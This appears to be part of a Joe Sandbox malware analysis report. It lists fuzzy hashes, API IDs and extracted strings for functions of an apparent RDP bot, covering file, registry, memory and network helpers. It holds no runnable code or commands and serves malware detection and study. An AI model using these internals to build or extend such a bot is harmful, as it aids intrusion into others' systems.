    • Instruction ID: 71fd66c5e2e2ebe75902f2ea95c5e7fc59036c093a7a37a7457b16f9897b52bf
    • Opcode Fuzzy Hash: 7514cd20b27e907929f1a418a85780667d7c45201f85419700cd80c35fa270af
    • Instruction Fuzzy Hash: E9519361E0DE47CDFA209B12E44027D26519F303A4F5053F2E97EA6AF8DE2CE985C709
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Deletefflushfwrite
    • String ID: (key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
    • API String ID: 2939363742-1701293196
    • Opcode ID: 71e359711ef35e69ae2a96206f6f5258ce76c1960beb5f0bfe9bab49c5c139ac
    • Instruction ID: b1ba2474057fe831945428304cdba6bfea706c84077b42ab44cb5f41c6529b64
    • Opcode Fuzzy Hash: 71e359711ef35e69ae2a96206f6f5258ce76c1960beb5f0bfe9bab49c5c139ac
    • Instruction Fuzzy Hash: 22415E52D0CD138DFA209A16A8403BD52516F64778F8A03F2EC7E77AB0DE1DADC59389
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorGlobalLastMemoryStatus
    • String ID: $(mi != NULL)$;$C:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
    • API String ID: 3848946878-3004215591
    • Opcode ID: 85c3a2dd30ad7397df65ac58cc5cbe68b13c8f9c365175e3deb9b9c3fb48f759
    • Instruction ID: 4725bfdd5fe95d3e040d5f01e76fe82c8e381cad71a77b942eefae8869e39b48
    • Opcode Fuzzy Hash: 85c3a2dd30ad7397df65ac58cc5cbe68b13c8f9c365175e3deb9b9c3fb48f759
    • Instruction Fuzzy Hash: 03312F20E0DF43CAFB208756A48037C12509F78328FA443FAC52E36DB1AE9D69D6C309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CloseHandleObjectSingleWait$CriticalDeleteSection
    • String ID: Done$[I] (%s) -> %s$server_cleanup
    • API String ID: 904620939-1981861988
    • Opcode ID: c82478e3e6ed024dc819f4f9e8d89e1b260c7a75ad157ef554709ace1bcf0102
    • Instruction ID: 9ca0097f3210207a4abdd4baa7b267ab091bd71f8ab1fd6adbfd7adc64469bf6
    • Opcode Fuzzy Hash: c82478e3e6ed024dc819f4f9e8d89e1b260c7a75ad157ef554709ace1bcf0102
    • Instruction Fuzzy Hash: CC218764908E06CDEA149B27FC543382262BFA5B74F9003F5D57E66AF0CF3CA4899348
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: ErrorFileLast$CloseCreateHandleSize
    • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
    • API String ID: 3555958901-1687387729
    • Opcode ID: b3b36dbc8afbe191cb24fb57c58e9f50c49046a9dc923a32d3657b398a5ad375
    • Instruction ID: c09b63ad5f245e1315dd40a5a359a5c593c9f3719029ae65f28b6591bc918d8e
    • Opcode Fuzzy Hash: b3b36dbc8afbe191cb24fb57c58e9f50c49046a9dc923a32d3657b398a5ad375
    • Instruction Fuzzy Hash: 8A611B51D0CD128AFB228626A44437C51539F60374F2507F6C87EB7AF0DEADACE5538A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: File$CloseCreateErrorHandleLastTime
    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
    • API String ID: 2291555494-3647951244
    • Opcode ID: be5ba19aa747141ecec10db0bbfd4defc062e68ed8210f063c976043a40573cd
    • Instruction ID: 81049997388b2bae1af777c78325e21a992a13d35447383065534bdc9d75f319
    • Opcode Fuzzy Hash: be5ba19aa747141ecec10db0bbfd4defc062e68ed8210f063c976043a40573cd
    • Instruction Fuzzy Hash: 6B516162D0CA468EFA228B12950477D11526F207B4F1847F1E93E7BAF0DE6DACD5C349
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: _errno
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
    • API String ID: 2918714741-1991603811
    • Opcode ID: 1535ae5d27a888cf2ff86a259e1bf70aef749437b50ce9cff9f424e1d448de43
    • Instruction ID: 82707c8be9b315185cfeea337dbebac740511943a59ee85c7eda31a8704b235a
    • Opcode Fuzzy Hash: 1535ae5d27a888cf2ff86a259e1bf70aef749437b50ce9cff9f424e1d448de43
    • Instruction Fuzzy Hash: 7C21D622A08E4389E7519B16E8407AE7361BB647E4F4401B1DE5D57B74DF3DE885C708
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: _errno
    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
    • API String ID: 2918714741-1670302297
    • Opcode ID: 8a32a5f15bec551d0fa06d9b8f111ba04d32c29d8a1e9e0671d5aa2e5a35198a
    • Instruction ID: 266d3e34f01febe192ac4cbf53e3922e746344fbb0c76b72f68f5634d6ae7558
    • Opcode Fuzzy Hash: 8a32a5f15bec551d0fa06d9b8f111ba04d32c29d8a1e9e0671d5aa2e5a35198a
    • Instruction Fuzzy Hash: BC21D362A08E42CEE7109F16E8417AA7771BB647A4F4441B2EE5D57A70CF3CE985C708
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CopyErrorFileLastfflushfwrite
    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
    • API String ID: 2887799713-3464183404
    • Opcode ID: 0cde63d2d73bc3ee3e4985846507ab73c88c7410a3840d6540dc0cbde3aaf1ce
    • Instruction ID: 1389cf2255ea279cc27f08ce89347e0b910c984261facc1296d679c2867b8aec
    • Opcode Fuzzy Hash: 0cde63d2d73bc3ee3e4985846507ab73c88c7410a3840d6540dc0cbde3aaf1ce
    • Instruction Fuzzy Hash: FD418351D0CE5A8DFA254A1BA80037D26557F20BBCF0402F6CA3F76AB0DE5CA6C5A309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: DeleteErrorFileLast
    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
    • API String ID: 2018770650-4119452840
    • Opcode ID: 58a51e74656b0af7e942238bf432331166d2bea4ac7c9a4a536c398104f5d388
    • Instruction ID: 047d1a38bc33608ec47bf50ded60d1bfca9985aebbd00c6e9d0a0c26dcd3fefb
    • Opcode Fuzzy Hash: 58a51e74656b0af7e942238bf432331166d2bea4ac7c9a4a536c398104f5d388
    • Instruction Fuzzy Hash: E1311C51E0DE4B8EFE205A16A4403BC21414F71374F9402F2DA3EBAAB5ED1CE9C5A30E
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strlen
    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
    • API String ID: 39653677-892027187
    • Opcode ID: 4d2c137a5ca34b3a41fb2fe785c001060c3ab27a8fe74f4b335b356c5c02f14a
    • Instruction ID: ded8fcd02bfbcf7c42e68fff9c0376276aef2ca82c465f27ebca88a0f454a1cf
    • Opcode Fuzzy Hash: 4d2c137a5ca34b3a41fb2fe785c001060c3ab27a8fe74f4b335b356c5c02f14a
    • Instruction Fuzzy Hash: 3F51B3D1B0DD439DFA158A17B8103BD1A527F317A8F4402F2D96E6AAB0DE2DE985C308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: strlen$strcat
    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
    • API String ID: 2335785903-2423714266
    • Opcode ID: 5219bfe88a4293736111a7c31e3a6ed39a6b726d201ebfbc16992e6b5c0e07c9
    • Instruction ID: 0d86867a01c0341a024ab25226711ace7d6596786ec4e06241878a172c38aec9
    • Opcode Fuzzy Hash: 5219bfe88a4293736111a7c31e3a6ed39a6b726d201ebfbc16992e6b5c0e07c9
    • Instruction Fuzzy Hash: B611A552E0CE474CFA055E2768043BD1A921F317E4F4C46F0DB2D2E6B2DE2DA4808304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: AttributesErrorFileLast
    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
    • API String ID: 1799206407-4111913120
    • Opcode ID: a4b2d97e6a775f1c1535ac20e491ba85971c6ba7deebe2af963bd61ba2e115fa
    • Instruction ID: dc3e023662f771a39d3b316053c02f468a929dd743ef827fda73f696281baded
    • Opcode Fuzzy Hash: a4b2d97e6a775f1c1535ac20e491ba85971c6ba7deebe2af963bd61ba2e115fa
    • Instruction Fuzzy Hash: D521C450E0DC438AFB22421A944837D16435F20329F6447F2E13EBAAB0CE6DFCE5925A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: inet_addr
    • String ID: (s != NULL)$(v != NULL)$C:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
    • API String ID: 1393076350-1216860922
    • Opcode ID: 7f7db49ab8739c9b5712ac515c28f81b017c72279804716331c1bac347e72ec9
    • Instruction ID: 8a37170900f59343444dd5810c8a8f65de6e5508fda81721d6e78e879b9e42bf
    • Opcode Fuzzy Hash: 7f7db49ab8739c9b5712ac515c28f81b017c72279804716331c1bac347e72ec9
    • Instruction Fuzzy Hash: 8F112EE090DD4B8EFB149B26A4103B8A391AF34364F4442F1D56EAA5B5EF3DE9859308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: AddressErrorLastLibraryLoadProc
    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
    • API String ID: 3511525774-1584720945
    • Opcode ID: 9b700d28ed91bfab59ffa1db2879eba2b7b4d771a22d34dad83c008a7b71e121
    • Instruction ID: 008626fbd6e525eaf84d94077c0b59ced5e64625e3fd866f850e39489f4a0d35
    • Opcode Fuzzy Hash: 9b700d28ed91bfab59ffa1db2879eba2b7b4d771a22d34dad83c008a7b71e121
    • Instruction Fuzzy Hash: DD119A60E09E47CDFA109727E8403B822916F70364F5001F6D42EB96F5EEADE984C348
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Sleep_amsg_exit$_initterm
    • String ID:
    • API String ID: 2193611136-0
    • Opcode ID: 44bbde860a3edeeaa30dd7d665b09d0d3c475e80bdcbd8e9cfabc7b51761c1ce
    • Instruction ID: c47e10bc0746840cf2c71c66700ef8352f99afc9b1f5545696407799954b7cbd
    • Opcode Fuzzy Hash: 44bbde860a3edeeaa30dd7d665b09d0d3c475e80bdcbd8e9cfabc7b51761c1ce
    • Instruction Fuzzy Hash: EA414D61E09E42CDFB519B17D85027D23A1AF64BA4F5841F1CD2EA7BB5DE2CE4808358
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Cleanupfflushfwrite
    • String ID: Done$[I] (%s) -> %s$net_cleanup
    • API String ID: 1441811225-3926276259
    • Opcode ID: 4f0e0253e0c6e05c14c783af6b7db350f88ab70b83a7d078b74eb60278dd72d4
    • Instruction ID: 27be88e251c9f7e6bfc0af0a56b8360daf8d6ba99b1ed3a969eb9c3fa0d83f73
    • Opcode Fuzzy Hash: 4f0e0253e0c6e05c14c783af6b7db350f88ab70b83a7d078b74eb60278dd72d4
    • Instruction Fuzzy Hash: 48D01250D09C07DCEA046753EC411B46362AF72324FD050F2C02E211718E2CB14EC708
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: _unlock$_lockrealloc
    • String ID:
    • API String ID: 4047297157-0
    • Opcode ID: 71741dcca08acb83e063b315e9e0101e0fd40cb23ab8f7ef72ce332049503488
    • Instruction ID: f8a43a4e8b28ef280aa308589a17fe504b35f41583df1a316bfa398ce21b113a
    • Opcode Fuzzy Hash: 71741dcca08acb83e063b315e9e0101e0fd40cb23ab8f7ef72ce332049503488
    • Instruction Fuzzy Hash: F711D621A0AF4189FB455F22D81036C62D5EF64BB4F1886B0EA6D5BBD4DE3CE8D1C324
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
    • Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
    • Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
